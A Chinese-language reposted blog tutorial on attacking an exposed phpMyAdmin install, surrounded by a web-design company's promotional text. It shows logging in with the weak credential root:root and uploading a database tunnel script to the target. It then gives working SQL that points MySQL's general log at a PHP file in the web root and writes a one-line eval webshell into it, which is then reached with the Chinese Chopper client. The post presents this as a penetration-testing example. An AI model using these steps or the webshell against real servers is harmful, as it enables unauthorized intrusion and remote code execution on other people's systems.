Phpmyadmin滲透測試的示例

這篇文章給大家分享的是有關(guān)Phpmyadmin滲透測試的示例的內(nèi)容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

成都創(chuàng)新互聯(lián)專注于長白網(wǎng)站建設(shè)服務(wù)及定制,我們擁有豐富的企業(yè)做網(wǎng)站經(jīng)驗。 熱誠為您提供長白營銷型網(wǎng)站建設(shè),長白網(wǎng)站制作、長白網(wǎng)頁設(shè)計、長白網(wǎng)站官網(wǎng)定制、微信小程序服務(wù),打造長白網(wǎng)絡(luò)公司原創(chuàng)品牌,更為您提供長白網(wǎng)站排名全網(wǎng)營銷落地服務(wù)。

首先通過目錄掃描對某站進行掃描,發(fā)現(xiàn)存在phpmyadmin,嘗試弱口令root:root很幸運進去了

Phpmyadmin滲透測試的示例

嘗試使用Navicate進行數(shù)據(jù)庫連接返回禁止遠程連接數(shù)據(jù)庫:

Phpmyadmin滲透測試的示例

但是遠程命令執(zhí)行發(fā)現(xiàn)本地3306端口時開放的,于是嘗試通過代理進行連接:

Phpmyadmin滲透測試的示例

Navicat安裝目錄下上傳ntunnel_MySQL.php文件(數(shù)據(jù)庫的代理腳本)到目標服務(wù)器任意web站點目錄(后面getshell后上傳的)

Phpmyadmin滲透測試的示例

上傳到D:/phpStudy/WWW目錄進行訪問http://XXX/ntunnel_mysql.php 測試成功

Phpmyadmin滲透測試的示例

進行測試連接:

(此時,在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個url,說白點兒就是個代理端,勾上使用base64編碼,防止waf從中作祟,然后主機名寫localhost,賬號密碼寫lnmp01本地數(shù)據(jù)庫用戶的賬號即可,因為要連接lnmp01本地的mysql)

Phpmyadmin滲透測試的示例

Phpmyadmin Get Shell:

利用日志文件

mysql 5.0版本以上會創(chuàng)建日志文件,修改日志的全局變量,也可以getshell。但是也要對生成的日志有可讀可寫的權(quán)限。

set global general_log = "ON";   #當開啟general時,所執(zhí)行的sql語句都會出現(xiàn)在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所執(zhí)行的sql語句就會對應(yīng)生成進而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #對應(yīng)就會生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #將一句話木馬寫入test1234.php文件

Phpmyadmin滲透測試的示例

菜刀連接:

Phpmyadmin滲透測試的示例

感謝各位的閱讀!關(guān)于“Phpmyadmin滲透測試的示例”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

標題名稱:Phpmyadmin滲透測試的示例
瀏覽路徑:http://muchs.cn/article42/ppjjhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)頁設(shè)計公司外貿(mào)建站、品牌網(wǎng)站設(shè)計網(wǎng)站策劃、全網(wǎng)營銷推廣、軟件開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

網(wǎng)站優(yōu)化排名